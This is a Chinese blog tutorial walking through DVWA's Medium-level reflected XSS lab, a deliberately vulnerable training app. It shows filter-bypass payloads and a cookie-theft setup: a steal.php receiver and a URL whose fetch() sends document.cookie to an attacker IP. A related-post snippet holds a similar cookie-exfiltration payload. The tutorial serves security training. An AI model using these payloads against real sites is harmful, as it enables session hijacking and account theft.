【DVWA系列】——xss(Reflected)——Medium详细教程

最新推荐文章于 2025-06-11 22:21:20 发布
最新推荐文章于 2025-06-11 22:21:20 发布
阅读量1.2k 收藏 14
点赞数 35
分类专栏: 网络安全 靶场练习 文章标签: xss 前端 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_84408069/article/details/148539837
版权

本文仅用于技术研究,禁止用于非法用途。
Author:枷锁

文章目录


本文环境Security Level:Medium
【DVWA系列】——反射型XSS(Reflected)——Medium级别详细教程

漏洞原理分析

在Medium级别中,DVWA添加了基础防护措施但存在明显缺陷:

if (array_key_exists("name", _GET) && _GET['name'] != NULL) {
    // 尝试过滤<script>标签(但防御不完整)
    name = str_replace('<script>', '', _GET['name']);
    echo '<pre>Hello ' . $name . '</pre>';
  • 关键安全漏洞:
    仅过滤<script>字符串(大小写敏感)
  • 未处理其他标签(如<img>、<svg>
    未过滤事件处理器(如onerror、onload)
    未进行HTML实体编码

四种攻击方法与Payload示例

方法1:大小写绕过(简单有效)

<ScRiPt>alert('XSS')</ScRiPt>

原理: str_replace区分大小写,大写变形不被过滤
在这里插入图片描述

方法2:嵌套标签绕过

<scr<script>ipt>alert('XSS')</script>

原理: 过滤移除内层

移除后: <scr ipt>alert('XSS')</script> → 实际执行为<script>alert('XSS')</script>
在这里插入图片描述

方法3:非<script>标签利用

<img src="x" onerror=alert('XSS')>

效果: 当图片加载失败时执行onerror中的JS代码
在这里插入图片描述

方法4:SVG标签利用

<svg onload=alert('XSS')>

优势: 无需外部资源,直接执行JS

在这里插入图片描述

获取cookie步骤

步骤1:环境配置
设置DVWA安全级别为Medium

访问XSS(Reflected)页面:

http://<靶机IP>/dvwa/vulnerabilities/xss_r/

步骤2:执行XSS攻击
在输入框输入Payload:

<img src=x onerror=alert(document.cookie)>

点击"Submit"按钮

结果: 成功弹出会话cookie弹窗

在这里插入图片描述

步骤3:窃取Cookie实战
准备接收服务器(攻击者控制):

创建steal.php:

      <?php
 cookie = _GET['c'];
 file_put_contents('cookies.txt', $cookie."\n", FILE_APPEND);
 ?>

构造恶意URL:

   http://<靶机IP>/dvwa/vulnerabilities/xss_r/?name=<img src=x onerror="fetch('http://攻击者IP/steal.php?c='+document.cookie)">

诱导管理员访问该链接

验证: 查看cookies.txt获取到的会话Cookie

防御机制分析及绕过原理

防护措施 绕过方法 原理说明

加固要点:
在这里插入图片描述

📌 核心总结
在这里插入图片描述

🔐 伦理声明: 本教程仅限于授权测试环境使用,未经授权对他人系统实施XSS攻击属违法行为。

宇宙级免责声明​​
🚨 重要声明:本文仅供合法授权下的安全研究与教育目的!🚨
1.合法授权:本文所述技术仅适用于已获得明确书面授权的目标或自己的靶场内系统。未经授权的渗透测试、漏洞扫描或暴力破解行为均属违法,可能导致法律后果(包括但不限于刑事指控、民事诉讼及巨额赔偿)。
2.道德约束:黑客精神的核心是建设而非破坏。请确保你的行为符合道德规范,仅用于提升系统安全性,而非恶意入侵、数据窃取或服务干扰。
3.风险自担:使用本文所述工具和技术时,你需自行承担所有风险。作者及发布平台不对任何滥用、误用或由此引发的法律问题负责。
4.合规性:确保你的测试符合当地及国际法律法规(如《计算机欺诈与滥用法案》(CFAA)、《通用数据保护条例》(GDPR)等)。必要时,咨询法律顾问。
5.最小影响原则:测试过程中应避免对目标系统造成破坏或服务中断。建议在非生产环境或沙箱环境中进行演练。
6.数据保护:不得访问、存储或泄露任何未授权的用户数据。如意外获取敏感信息,应立即报告相关方并删除。
7.免责范围:作者、平台及关联方明确拒绝承担因读者行为导致的任何直接、间接、附带或惩罚性损害责任。

🔐 安全研究的正确姿势:
✅ 先授权,再测试
✅ 只针对自己拥有或有权测试的系统
✅ 发现漏洞后,及时报告并协助修复
✅ 尊重隐私,不越界

⚠️ 警告:技术无善恶,人心有黑白。请明智选择你的道路。

希望这个教程对你有所帮助!记得负责任地进行安全测试。

DVWA——XSS注入复现
m0_74825718的博客
12-12 826
找方法绕过服务器端的处理,直接在本地运行我们构造的语句,可以通过“#”来注释掉后面的内容,因为URL栏中的“#”之后的内容不会被发送到服务器当中去,不会经过JS的过滤,只在客户端显示,可以直接与浏览器进行交互。按照常理来说在low等级中没有对Name做任何限制是应该能够对其进行同样的XSS攻击的,查看别人的博客得知前端页面中返回给后端的Name的值是没有限制的,所以我们可以通过更改Name的maxlenth的值来对它进行XSS攻击实现。我们可以使用/来代替空格,通常可以用/**/,注释符号绕过;
DVWA-XSSReflected)Low Medium High低中高级别_dvwa靶场xss reflected 中级(1)
2401_84281748的博客
05-07 312
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
dvwa11——XSS(Reflected)
2403_88102829的博客
06-05 561
分析源码:无过滤和上一关一样,这一关在输入框内输入,成功回显。
DVWA-XSSReflected)Low Medium High低中高级别_dvwa靶场xss reflected 中级
2401_84301922的博客
04-28 436
在输入框中输入 payload,点 submit 提交弹窗就算过关。
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
DVWA靶场练习(十)—— XSS (Reflected)
liuzibo1024的博客
11-08 335
反射型XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者往Web页面里插入恶意JavaScript代码。当用户浏览该页面时,嵌入其中的JavaScript代码会被执行,从而达到恶意攻击用户的目的。反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性,攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。
DVWA练习——XSS
haoaaao的博客
01-22 460
一、xssreflected) (1)难度:low 提交代码 (2)难度:medium a、查看源代码,发现将<script>标签替换置空 b、发现将某个东西替换成空,首先想到“双写绕过”的办法 /****双写绕过eg:构造<sc<script>ript>,当<script>被过滤掉时,剩下的字符自动拼接在一起,就形成了<script> ****/ (3)、难度:high 查看源码,发现对多个...
网络安全DVWAXSS(Reflected)攻击姿势及解题详析合集
等风来
05-17 1万+
Payload:alert("qiu")由于str_replace() 函数将标签替换为空,且str_replace函数仅执行一次Payload将变为alert("qiu"),从而实现了正常XSS语句的注入在 PHP 中,变量名、函数名、常量名等标识符都是区分大小写的。 例如,$Qiu 和 $qiu 是两个不同的变量因此我们可构造Payload如下来绕过限制:Payload:alert("
DVWA靶场通关——反射性XSS漏洞
sucker的博客
12-02 2138
它发生在Web应用程序将用户输入的数据(如URL中的查询参数、HTTP头部、表单输入等)直接反射到HTML响应中,而没有经过适当的过滤和转义,导致攻击者的恶意脚本在受害者浏览器中执行。例如,攻击者通过XSS窃取用户的会话Cookie或身份认证信息,并用这些信息发起恶意请求(如修改用户的账户信息或进行资金转账)。3,可以看到通过各种过滤手段是能够实现对<script>标签限制过滤的绕过,其本质就是要让服务器端去“傻傻的”执行我们注入的恶意代码,javascript丰富的功能标签为我们的绕过提供了可能。
DVWA - XSS Reflected(medium)
qq_42630215的博客
06-09 305
输入常规的payload <script>alert(document.cookie)</script> script标签应该是被过滤了 方法一 大写绕过 <SCRIPT>alert(document.cookie)</SCRIPT> 执行成功 方法二 双写绕过 <sc<script>ript>alert('xss')</script> 方法三 其他标签 在这里插入代码片 img标签: <img src=1
渗透测试PortSwigger Labs:遭遇html编码和转义符的反射型XSS
最新发布
ericalezl的博客
06-11 144
1 处是我们输入的标签被服务器 html 编码后返回,被浏览器当作字符串显示出来,无法执行 javascript。让服务器添加的转义符失效,单引号逃逸。依然存在转移单引号,我们输入转义符。,第一个分号用来结束前面的变量定义。2 处是唯一能控制的地方,正好在。时 js 中的注释,如下图所示。标签范围内,可以尝试构造。
零基础学前端-传统前端开发(第二期-HTML介绍与应用)(XSS防御)
2404_89737060的博客
06-10 1193
零基础学前端-传统前端开发(第二期-HTML介绍与应用)(XSS防御)
xss分析
tainqiuer123的博客
06-11 158
标签中使用CDATA区段来包裹JavaScript代码,这样就可以在。标签的内容,这样它就不会执行嵌入的JavaScript代码。如果你是在JavaScript中操作DOM元素,可以使用。标签中使用JavaScript代码而不会执行。创建一个文本节点而不是直接插入HTML字符串。标签中的内容不会执行,只会被当作普通文本显示。等字符转换为对应的HTML实体编码。
XSS(跨站脚本攻击)详解
tubug的博客
06-07 441
XSS(Cross-Site Scripting,跨站脚本攻击)漏洞,攻击者将恶意脚本注入到Web页面中,当用户访问这些页面时,恶意脚本会在用户的浏览器中执行,可能导致数据泄露、会话劫持或钓鱼攻击等安全问题。在将动态数据输出到HTML、JavaScript、CSS等上下文时,对数据进行适当的编码,确保其被视为纯文本而非可执行代码。DOM XSS不依赖于服务器端的漏洞,而是利用客户端JavaScript代码中的缺陷,在用户的浏览器中执行恶意脚本。移除或转义潜在的恶意字符(如 <、>、" 等)。
渗透靶场PortSwigger Labs指南:规范链接的反射XSS
ericalezl的博客
06-10 197
指定网页的规范URL(Canonical URL),告诉搜索引擎哪个版本是页面的“主版本”,避免访问到其他版本的链接。但是由于这里输入的东西不会显示到页面上,无法让用户点击执行,所以需要通过设置快捷键的方式执行。中的 url 后输入构造的语句,对规范链接设置某种可触发事件,触发。时页面出现了问题,我们输入的一个</script>被 DOM 解析了。可以看到链接在单引号内,我们可以尝试通过拼接单引号设置某种属性。标签中的关键属性,用于定义当前文档与链接资源之间的关系。可以看到我们测试语句的。
DVWA系列】——xss(DOM)——High详细教程
2402_84408069的博客
06-11 628
本文深入剖析了DVWA中DOM型XSS(High级别)的高级攻防技术。High级别通过正则表达式过滤<script>标签及HTML片段,但仍存在空字符绕过、伪协议利用等漏洞。文章详细演示了三种高级绕过手法:空字符分割攻击、JavaScript伪协议利用和跨文档攻击向量,并给出0-click Cookie窃取的完整实现方案,包括自动化Payload构造、WebSocket加密通道等隐蔽技术。在防御方面,提出企业级五重防护矩阵:严格白名单验证、安全DOM操作、输出编码、CSP策略和安全参数解析
随记 minio的图片跨域问题
zqx_7的博客
06-11 141
文章摘要:开发时使用IP访问无问题,上线后因IP与域名不同源出现跨域问题。尝试通过nginx代理但误指向前端静态资源。解决方案是单独为图片访问地址配置子域名:先绑定IP,申请SSL证书(支持动态域名),然后正确配置nginx代理规则。最终可通过配置好的专属域名访问图片资源,有效解决跨域问题。整个处理过程涉及域名绑定、SSL配置和nginx代理设置三个关键步骤。(148字)
DVWA环境中,选择XSSReflected),进行获取cookie攻击
11-20
DVWA环境中,选择XSSReflected)进行获取cookie攻击的步骤如下: 1.访问DVWA网站,输入用户名和密码进行登录。 2.选择XSSReflected)并选择medium或low级别。 3.在输入框中输入以下代码并提交: ```<script>document.location='http://yourdomain.com/cookie.php?cookie='+document.cookie</script>``` 其中,http://yourdomain.com/cookie.php是你自己的网站地址,用于接收cookie。 4.打开cookie.php文件,即可获取到cookie信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值